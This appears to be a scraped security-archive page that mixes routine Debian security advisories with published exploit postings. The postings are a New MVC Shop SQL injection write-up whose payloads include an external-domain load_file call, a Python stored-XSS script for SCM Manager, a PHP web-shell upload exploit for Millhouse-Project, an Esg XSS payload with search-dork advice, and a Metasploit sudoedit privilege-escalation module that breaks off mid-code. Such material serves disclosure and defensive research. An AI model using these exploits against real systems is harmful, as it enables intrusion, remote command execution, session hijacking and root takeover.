Debian Linux Security Advisory 5412-1 - Several vulnerabilities were discovered in libraw, a library for reading RAW files obtained from digital photo cameras, which may result in denial of service or the execution of arbitrary code if specially crafted files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5412-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : librawCVE ID         : CVE-2021-32142 CVE-2023-1729Debian Bug     : 1031790 1036281Several vulnerabilities were discovered in libraw, a library for readingRAW files obtained from digital photo cameras, which may result indenial of service or the execution of arbitrary code if speciallycrafted files are processed.For the stable distribution (bullseye), these problems have been fixed inversion 0.20.2-1+deb11u1.We recommend that you upgrade your libraw packages.For the detailed security status of libraw please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/librawFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRyXNFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S6ehAAlIVUex5cV2eOg9y4Z4MrXPPEl7DPhsEItBnU6tA0PQLxImblhRY2+bruFw7S3ovXQxOJQRW3CQ7ykRenfERuZXvENJwbauwD4XFAFPOHcs0lEkdAumQ4pEnxczetY/GXvXVqZ5L2LD8SDLrPLO37u5JNZGclVHn+2OkzSPm3rMwvXXPy0uik6PG1dlJBTbAeTm8bCls+TEvcCD3M1EgwqcJ4Cemnd43R4BvLsd8FJWWB41XrbvEtt5s644k3eJ19EkjYJ/lfi2Uu2b6m1crdFt1DSFl1UlGaMWL/Jz+R8OzAYenlY7RRXzZOsMSPlt4B4TUC1AG0WgeZhec4StNDhdQyNZ4ild/2yUqR0cdMLWIHs1Lst+Yr4sKO4BAe75otA93nV49bicwgA+8Sb4nehLZAIm+dUbc+6SmqwntHsfZpSyWTt4FuAH6dM8R6hOAXkQ7DI9x9eod1NLH0FXqcl61qAKrfs348Rd4vPZY5TCndxvSJDuyynDFs9GrYKgN0mN/2ePAgj2Y7CvfUnkoVwK9AeQRETkSLzTwivT+XBc2RUaYRohGARp7DXnoEhtvLUx1Efr1LKXNizT958kpBPvTp3fVf6iP/fW9VtZudbvQb2wBrF7iDe/r4PX2OoYXdbm5qiV7wU20M+YQwZqIva95FQkKxdtPfnYzAWpWMa8g¿zv-----END PGP SIGNATURE-----

Debian Security Advisory 5412-1

Debian Linux Security Advisory 5414-1 - Jose Gomez discovered that the Catalog API endpoint in the Docker registry implementation did not sufficiently enforce limits, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5414-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 27, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : docker-registryCVE ID         : CVE-2023-2253Debian Bug     : 1035956Jose Gomez discovered that the Catalog API endpoint in the Dockerregistry implementation did not sufficiently enforce limits, whichcould result in denial of service.For the stable distribution (bullseye), this problem has been fixed inversion 2.7.1+ds2-7+deb11u1.We recommend that you upgrade your docker-registry packages.For the detailed security status of docker-registry please refer toits security tracker page at:https://security-tracker.debian.org/tracker/docker-registryFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRx4msACgkQEMKTtsN8TjZ7fw/9E+dbZBJfuAwWXfAdwAuSE+6aN2Ddqb956wFeT0K+sMaEzhnDthATuJx0cR8K9TfVOcSUbn7bhi/fDxlWMoUL+wN14MxwphZ2udEAgkv052bz97/vAU2bcGNuye081BQWgbdpxm4Y5ioVSyze0y9uixKkBA6grnc9DQoEZz/4cqifxJh5itwFi/AC5TuNzZk4HY7kDrRf/OLZZpZFNloNP9G535FxEdmjR3jTd6scSbEnwmXmuUPUQwo6IfrCLnPRVXY0Vn2Pphb8fK1vsYZrWQpzvBHr4UO/z8F14Pl1AVqQNh0Oct5y/oDhY4MN8n9e5Zsx4lunBczhOS8fGy0gU2ZLK12KTLeTdA1TSZMV6MrkFdYAiWDI6+qP7f8LQi4m1h2HqJX9nm50eEjZ4lfwtK0Xwb0YQEkadpnknbdQM1zkojblFZOjQqq8GQwQQYD+XfIRThZWLz3vA9RhE1MH0/p5JNxfQmm2VG7xdtBdWV5PRtnUtC9KoYQ4wyJjE4AxRbbVbVGoyuoQOCEmMt+MYp68aYjHQD6szT9aGNpyxKdncjHVAVQGdb4cYPAi3m0uObQKsy0q6tDXu+8BhZDoFaFlyy9AtFjPL0mE36FTiLxOmkkJ0Xi4fNlu4Ghq2yiX/lK+xuXjQ+D7SVu6KEuKg8p7ATxIh5k2AmSh6bO7Gz8=vOWz-----END PGP SIGNATURE-----

Debian Security Advisory 5414-1

New MVC Shop version 1.0 suffers from remote SQL injection and missing attribute vulnerabilities.

    ## Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak securityPHPSESSID Hijacking## Author: nu11secur1ty## Date: 05.29.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://portswigger.net/web-security/sql-injection## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\ttq1xmuilflmnv0pcl7cjdwb42avymmdp1koacz.pedal.com\\iqp'))+'was submitted in the User-Agent HTTP header. This payload injects aSQL sub-query that calls MySQL's load_file function with a UNC filepath that references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can retrieve all information from thedatabase of this system.---------------------------------------------------------------------------------------------------------------The following cookie was issued by the application and does not havethe secure flag set:PHPSESSID: The cookie appears to contain a session token, which mayincrease the risk associated with this issue.The malicious user can use one PHPSESSID to connect multiple times onthe system using the same account session.STATUS: HIGH Vulnerability[+]Payload:```mysql---Parameter: User-Agent (User-Agent)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8)Gecko/20050517 Firefox/1.0.4 (Debian package 1.0.4-2)' AND (SELECT2825 FROM (SELECT(SLEEP(15)))VKYP)-- kuoe---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/new-mvc-shop-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/new-mvc-shop-10-sqli-samesite-attribute.html)## Time spend:00:35:00

New MVC Shop 1.0 SQL Injection / Missing Attributes

Debian Linux Security Advisory 5411-1 - Multiple issues were found in GPAC multimedia framework, which could result in denial of service or potentially the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5411-1                   security@debian.org  
https://www.debian.org/security/                                  Aron Xu  
May 26, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : gpac  
CVE ID         : CVE-2020-35980 CVE-2021-4043 CVE-2021-21852 CVE-2021-33361   
                 CVE-2021-33363 CVE-2021-33364 CVE-2021-33365 CVE-2021-33366   
                 CVE-2021-36412 CVE-2021-36414 CVE-2021-36417 CVE-2021-40559   
                 CVE-2021-40562 CVE-2021-40563 CVE-2021-40564 CVE-2021-40565   
                 CVE-2021-40566 CVE-2021-40567 CVE-2021-40568 CVE-2021-40569   
                 CVE-2021-40570 CVE-2021-40571 CVE-2021-40572 CVE-2021-40574   
                 CVE-2021-40575 CVE-2021-40576 CVE-2021-40592 CVE-2021-40606   
                 CVE-2021-40608 CVE-2021-40609 CVE-2021-40944 CVE-2021-41456   
                 CVE-2021-41457 CVE-2021-41459 CVE-2021-45262 CVE-2021-45263   
                 CVE-2021-45267 CVE-2021-45291 CVE-2021-45292 CVE-2021-45297   
                 CVE-2021-45760 CVE-2021-45762 CVE-2021-45763 CVE-2021-45764   
                 CVE-2021-45767 CVE-2021-45831 CVE-2021-46038 CVE-2021-46039   
                 CVE-2021-46040 CVE-2021-46041 CVE-2021-46042 CVE-2021-46043   
                 CVE-2021-46044 CVE-2021-46045 CVE-2021-46046 CVE-2021-46047   
                 CVE-2021-46049 CVE-2021-46051 CVE-2022-1035 CVE-2022-1222   
                 CVE-2022-1441 CVE-2022-1795 CVE-2022-2454 CVE-2022-3222   
                 CVE-2022-3957 CVE-2022-4202 CVE-2022-24574 CVE-2022-24577   
                 CVE-2022-24578 CVE-2022-26967 CVE-2022-27145 CVE-2022-27147   
                 CVE-2022-29537 CVE-2022-36190 CVE-2022-36191 CVE-2022-38530   
                 CVE-2022-43255 CVE-2022-45202 CVE-2022-45283 CVE-2022-45343   
                 CVE-2022-47086 CVE-2022-47091 CVE-2022-47094 CVE-2022-47095   
                 CVE-2022-47657 CVE-2022-47659 CVE-2022-47660 CVE-2022-47661   
                 CVE-2022-47662 CVE-2022-47663 CVE-2023-0770 CVE-2023-0818   
                 CVE-2023-0819 CVE-2023-0866 CVE-2023-1448 CVE-2023-1449   
                 CVE-2023-1452 CVE-2023-1654 CVE-2023-2837 CVE-2023-2838   
                 CVE-2023-2839 CVE-2023-2840 CVE-2023-23143 CVE-2023-23144   
                 CVE-2023-23145

Multiple issues were found in GPAC multimedia framework, whcih could result  
in denial of service or potentially the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.0.1+dfsg1-4+deb11u2.

We recommend that you upgrade your gpac packages.

For the detailed security status of gpac please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/gpac

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwutMACgkQO1LKKgqv  
2VQhxgf/aXBHEqvI+O12zLVGiSFBgAgP0WpynhRv+ESync2+EFNBpF/1/w0CAhVr  
mn3NWsUxj21u4Pm9YjfvG7+YXaDTaEqkrgwVknvZKwV6KY42mSEvztWfqTk5xEe1  
Hi7MUL+xKIjUblcgFxNSEAZkb/u9XO3KE7XbPKqNE+FZtz+K95Vtq7CGx+jvpa/F  
Q+e286fsay38RYsI+ESqxe8N5WYljiIph/thot/uawV6vSNYqR1te4wzn//AkDvL  
ADq4Hsr3yQSpDbPEToJwS+Q/Gd4YH7IsqtdSMWdtnrxC6Ri4zSrq+AlOvPe7xM35  
aIUZuLxhqlp6rmBBhNYefgqTiX1vdg==  
=faP5  
-----END PGP SIGNATURE-----

Debian Security Advisory 5411-1

Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Debian Security Advisory 5413-1

SCM Manager versions 1.2 through 1.60 suffer from a persistent cross site scripting vulnerability.

    #!/usr/bin/python3# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)# Google Dork: intitle:"SCM Manager" intext:1.60# Date: 05-25-2023# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)# Vendor Homepage: https://scm-manager.org/# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/# Version: 1.2 <= 1.60# Tested on: Debian based# CVE: CVE-2023-33829# Modulesimport requestsimport argparseimport sys# Main menuparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')parser.add_argument("-u", "--user", help="Admin user or user with write permissions")parser.add_argument("-p", "--password", help="password of the user")args = parser.parse_args()# Credentialsuser = sys.argv[2]password = sys.argv[4]# Global Variablesmain_url = "http://localhost:8080/scm" # Change URL if its necessaryauth_url = main_url + "/api/rest/authentication/login.json"users = main_url + "/api/rest/users.json"groups = main_url + "/api/rest/groups.json"repos = main_url + "/api/rest/repositories.json"# Create a sessionsession = requests.Session()# Credentials to sendpost_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions}r = session.post(auth_url, data=post_data)if r.status_code == 200:  print("[+] Authentication successfully")else:  print("[-] Failed to authenticate")  sys.exit(1)new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml"}create_user = session.post(users, json=new_user)print("[+] User with XSS Payload created")new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml"}create_group = session.post(groups, json=new_group)print("[+] Group with XSS Payload created")new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False}create_repo = session.post(repos, json=new_repo)print("[+] Repository with XSS Payload created")

SCM Manager 1.60 Cross Site Scripting

Debian Linux Security Advisory 5410-1 - Multiple security issues were discovered in Sofia-SIP, a SIP User-Agent library, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5410-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 24, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sofia-sipCVE ID         : CVE-2022-31001 CVE-2022-31002 CVE-2022-31003 CVE-2022-47516                  CVE-2023-22741Multiple security issues were discovered in Sofia-SIP, a SIP User-Agentlibrary, which could result in denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.12.11+20110422.1-2.1+deb11u1.We recommend that you upgrade your sofia-sip packages.For the detailed security status of sofia-sip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sofia-sipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRt6GUACgkQEMKTtsN8TjbdIg/8DBVsizs1Bi1N65zEHRKfQ4wlq01lNnLMcEECsk/nBd44yZQJL1pudEBiSFmbcF6l4/oeUKvSo5RN1PBe9boVS+tq3ewAUyThZnrywRttFc09Atf3nQyhNaQz3+1SpqW2k6pTwB2+oilRRDITOorOrQM4hgvYxUhmhNmphNTQtEAbZHXYqAb3NaeKTWdKCfEdSthj0t4uOADcpS2XpK4jDR6ymjzPaIoenvYKV6JEVCo0qj1mSh7+K23dmWhV0WoQP2+W0xrZtkDx1SJHPEXfaQ2XXSuBUvyU351XqfWCTxrfBO3h1mlMrkRJmoSdyP9Pikkrm2bBATDjzl0vEpiWWnAtKaglRCJcBpbnIV7c3l2m61kY8osTZrYlKacRROyYUwpK8Q39l5i8shfCa4gbS+eZlQNjkFzTE8gpJDAmJi0FG2YEsN3E1u979AVnMkWMGe5qEYjybVNwl8OOJ/Ksl/sKsHbQ+s3IzSHwPRpSbHRYXIWTkGtJI3KJyyOpmSTdxBKY+YHmqGRhiOON8De+pcIlgn3LrCN92acRtK8vnQstDL+aNCuqUwY7wNiBrj4/JS4V8SuMn6zBeWDfLcbKYf3BLIsskYb6QuqAIssdNYUzCX4v8UTiiy2YuyBY/JDEutSTbn0ygQntur8BGpJiYHat6MffGhsw1knGhimoUkQ==q7se-----END PGP SIGNATURE-----

Debian Security Advisory 5410-1

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

thrsrossi Millhouse-Project 1.414 Shell Upload

Esg version 2.5 suffers from a cross site scripting vulnerability.

**Esg 2.5 Cross Site Scripting**

Posted May 24, 2023

Authored by indoushka

Esg version 2.5 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | af04171eca15deed52f8552f83c674dd50fbac0bfc4810eb316c96bde1b17488

Download | Favorite | View

**Esg 2.5 Cross Site Scripting**

    ===========================================================================================| # Title     : Esg 2.5 XSS Vulnerability                                                 || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://www.creatop.com.tw/esg                                            |  | # Dork      : Powered by CREATOP                                                        |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script>Greetings to :===================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|=================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,187)
*   Arbitrary (16,018)
*   BBS (2,859)
*   Bypass (1,690)
*   CGI (1,024)
*   Code Execution (7,128)
*   Conference (677)
*   Cracker (841)
*   CSRF (3,315)
*   DoS (23,129)
*   Encryption (2,360)
*   Exploit (51,088)
*   File Inclusion (4,193)
*   File Upload (952)
*   Firewall (821)
*   Info Disclosure (2,712)
*   Intrusion Detection (883)
*   Java (2,998)
*   JavaScript (838)
*   Kernel (6,550)
*   Local (14,376)
*   Magazine (586)
*   Overflow (12,597)
*   Perl (1,421)
*   PHP (5,123)
*   Proof of Concept (2,302)
*   Protocol (3,559)
*   Python (1,499)
*   Remote (30,474)
*   Root (3,552)
*   Rootkit (505)
*   Ruby (607)
*   Scanner (1,633)
*   Security Tool (7,845)
*   Shell (3,159)
*   Shellcode (1,211)
*   Sniffer (892)
*   Spoof (2,189)
*   SQL Injection (16,219)
*   TCP (2,394)
*   Trojan (687)
*   UDP (883)
*   Virus (664)
*   Vulnerability (31,548)
*   Web (9,548)
*   Whitepaper (3,742)
*   x86 (958)
*   XSS (17,668)
*   Other

**File Archives**

*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,970)
*   BSD (372)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,746)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,312)
*   HPUX (879)
*   iOS (342)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,712)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,293)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,597)
*   UNIX (9,230)
*   UnixWare (186)
*   Windows (6,554)
*   Other

Esg 2.5 Cross Site Scripting

This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package. The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root privileges. Affected versions are 1.8.0 through 1.9.12.p1. However, this module only works against Ubuntu 22.04 and 22.10. This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04 and 1.9.11p3-1ubuntu1 on Ubuntu 22.10.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Sudoedit Extra Arguments Priv Esc',        'Description' => %q{          This exploit takes advantage of a vulnerability in sudoedit, part of the sudo package.          The sudoedit (aka sudo -e) feature mishandles extra arguments passed in the user-provided          environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to          append arbitrary entries to the list of files to process. This can lead to privilege escalation.          by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root          privileges.          Affected versions are 1.8.0 through 1.9.12.p1. However THIS module only works against Ubuntu          22.04 and 22.10.          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04, and          1.9.11p3-1ubuntu1 on Ubuntu 22.10.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Matthieu Barjole', # original PoC, analysis          'Victor Cutillas' # original PoC, analysis        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'EDB', '51217' ],          [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],          [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],          [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],          [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],          [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],          [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],          [ 'CVE', '2023-22809' ]        ],        'DisclosureDate' => '2023-01-18',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),      OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ]),      OptInt.new('TIMEOUT', [true, 'The timeout waiting for sudo commands to respond', 10]),    ]  end  def timeout    datastore['TIMEOUT']  end  # Simplify pulling the writable directory variable  def base_dir    datastore['WritableDir'].to_s  end  def get_editable_file    if datastore['EDITABLEFILE'].present?      fail_with(Failure::BadConfig, 'EDITABLEFILE must be a file.') unless file?(datastore['EDITABLEFILE'])      vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}")      return datastore['EDITABLEFILE']    end    # we do a rev here to reverse the order since we only want the last entry (the file name), take item 1, then rev it back so its normal. this seemed to    # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E \'\$root\$|\$ALL\$|\$ALL : ALL\$\' | rev | cut -d " " -f 1 | rev')    editable_file = editable_file.strip    if editable_file.nil? || editable_file.empty? || editable_file.include?('a terminal is required to read the password') || editable_file.include?('password for')      return nil    end    return nil unless file?(editable_file)    editable_file  end  def get_sudo_version_from_sudo    package = cmd_exec('sudo --version')    package = package.split(' ')[2] # Sudo version XXX    begin      Rex::Version.new(package)    rescue ArgumentError      # this happens on systems like debian 8.7.1 which doesn't have sudo      Rex::Version.new(0)    end  end  def check    sys_info = get_sysinfo    # Check the app is installed and the version    if sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'      package = cmd_exec('dpkg -l sudo | grep \'^ii\'')      package = package.split(' ')[2] # ii, package name, version, arch      begin        ver_no = Rex::Version.new(package)      rescue ArgumentError        ver_no = get_sudo_version_from_sudo      end    else      ver_no = get_sudo_version_from_sudo    end    # according to CVE listing, but so much backporting...    minimal_version = '1.8.0'    maximum_version = '1.9.12p1'    exploitable = false    # backporting... so annoying.    # https://ubuntu.com/security/CVE-2023-22809    if sys_info[:distro] == 'ubuntu'      if sys_info[:version].include? '22.10' # kinetic        exploitable = true        maximum_version = '1.9.11p3-1ubuntu1.1'      elsif sys_info[:version].include? '22.04' # jammy        exploitable = true        maximum_version = '1.9.9-1ubuntu2.2'      elsif sys_info[:version].include? '20.04' # focal        maximum_version = '1.8.31-1ubuntu1.4'      elsif sys_info[:version].include? '18.04' # bionic        maximum_version = '1.8.21p2-3ubuntu1.5'      elsif sys_info[:version].include? '16.04'  # xenial        maximum_version = '1.8.16-0ubuntu1.10+esm1'      elsif sys_info[:version].include? '14.04'  # trusty        maximum_version = '1.8.9p5-1ubuntu1.5+esm7'      end    end    if ver_no == Rex::Version.new(0)      return Exploit::CheckCode::Unknown('Unable to detect sudo version')    end    if ver_no < Rex::Version.new(maximum_version) && ver_no >= Rex::Version.new(minimal_version)      vprint_good("sudo version #{ver_no} is vulnerable")      # check if theres an entry in /etc/sudoers that allows us to edit a file      editable_file = get_editable_file      if editable_file.nil?        if exploitable          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. Please set EDITABLEFILE option manually")        else          return CheckCode::Appears("Sudo #{ver_no} is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module")        end      elsif exploitable        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}")      else        return CheckCode::Vulnerable("Sudo #{ver_no} is vulnerable, can edit: #{editable_file}. OS can NOT be exploited by this module")      end    end    CheckCode::Safe("sudo version #{ver_no} may NOT be vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    if get_editable_file.nil?      fail_with Failure::BadConfig, 'Unable to automatically detect sudo editable file, EDITABLEFILE option is required'    end    # Make sure we can write our exploit and payload to the local system    unless writable?(base_dir) && directory?(base_dir)      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    sys_info = get_sysinfo    